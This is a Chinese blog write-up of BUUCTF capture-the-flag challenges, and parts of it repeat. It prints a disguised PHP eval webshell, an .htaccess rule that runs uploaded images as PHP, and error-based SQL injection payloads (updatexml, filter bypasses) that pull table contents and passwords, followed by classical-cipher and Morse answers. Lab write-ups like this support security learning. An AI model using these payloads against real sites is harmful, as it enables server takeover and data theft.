BUUCTF-.htaccess-sql.fuzz-D盾

双层小牛堡 809 阅读 0 评论 0 点赞

第七周第一次

WEB

[MRCTF2020]你传你🐎呢

编辑

[极客大挑战 2019]HardSQL

Crypto

萌萌哒的八戒

传统知识+古典密码

Misc

假如给我三天光明

后门查杀

文件上传我们进行尝试

设置一个 1.jpg的一句话木马

GIF89a
<script language='php'>eval($_POST['a']);</script>

然后抓包改后缀发现都不行于是想到让图片作为php来解析

.htaccess

SetHandler application/x-httpd-php

我们在上传一句话木马后进行上传这个文件让图片可以作为php来使用

进行抓包然后更改

改为

image/jpeg

上传成功然后我们直接进行蚁剑链接图片即可

http://534a8674-4d20-4e4a-8e8e-1b82af752c3b.node4.buuoj.cn:81/upload/8fe5b08686372083104ab7b299db9c64/1.jpg

说明是

username='1''

这种然后我们开始万能密码

1' or '1'='1

很明显是过滤了什么但是源代码又没有出现任何的过滤信息

这种时候就使用bp进行爆破看看过滤了什么

网络上找fuzz的字典

开始爆破

两个长度发现 736是过滤的 751是没有过滤的

其中我们使用得到

空格   ---》()
=   ----》like

开始查看数据库

我们使用报错注入

用户注入 admin'or(updatexml(1,concat(0x7e,database()),3))#admin
密码注入 0'like(updatexml(1,concat(0x7e,database()),3))#

得到数据库

开始爆表

密码
0'like(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#用户
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#

得到表开始爆字段

密码 admin
0'like(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#
用户
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),3))#

开始得到这些

密码
admin
0'like(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#账号
admin'or(updatexml(1,concat(0x7e,(select(group_concat(id,username,password))from(geek.H4rDsq1))),3))#

发现长度不够

flag{ca65a277-9271-4a11-8a

使用left 和right

0'like(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),3))#
flag{ca65a277-9271-4a11-8a7c-3
0'like(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),3))#7-9271-4a11-8a7c-30c698f0f31b}
flag{ca65a277-9271-4a11-8a7c-30c698f0f31b}

flag{whenthepigwanttoeat}

一甲子=60年

28  30  23 08  17  10  16  30
+60
88  90  83  68  77  70  76  90
ascii
XZSDMFLZ

然后开始尝试栅栏密码等

BUUCTF—传统知识+古典密码_buuctf 传统知识+古典密码_小常吃不下了的博客-CSDN博客

得到flag

kmdonowg

解压文件

听音乐是莫斯密码

CTFWPEI08732?23D

flag{wpei08732?23dz}

访问include

点赞(0) 打赏

本文分类：php基础
本文标签：php 开发语言
浏览次数：809 次浏览
发布日期：2023-06-13 14:56:07
本文链接：https://yinghuohong.cn/phpjichu/15940.html

上一篇 > Centos7安装PHP
下一篇 > php设计模式-组合模式的运用

BUUCTF-.htaccess-sql.fuzz-D盾

`flag{whenthepigwanttoeat}`

`kmdonowg`

解压文件

听音乐是莫斯密码

`CTFWPEI08732?23D`

`flag{wpei08732?23dz}`

访问include

评论列表共有 0 条评论

发表评论取消回复

BUUCTF-.htaccess-sql.fuzz-D盾

flag{whenthepigwanttoeat}

kmdonowg 解压文件 听音乐是莫斯密码 CTFWPEI08732?23D flag{wpei08732?23dz}

访问include

PHP实现在线进制转换器，10进制，2、4、8、16、32进制转换

fileclude（文件包含漏洞及php://input、php://filter的使用）

PHP 对银行卡，手机号，真实姓名，身份证进行掩码加星号处理

悟空CRM11.0 PHP版本docker容器化部署全流程

评论列表 共有 0 条评论

发表评论 取消回复

`flag{whenthepigwanttoeat}`

`kmdonowg`

解压文件

听音乐是莫斯密码

`CTFWPEI08732?23D`

`flag{wpei08732?23dz}`

评论列表共有 0 条评论

发表评论取消回复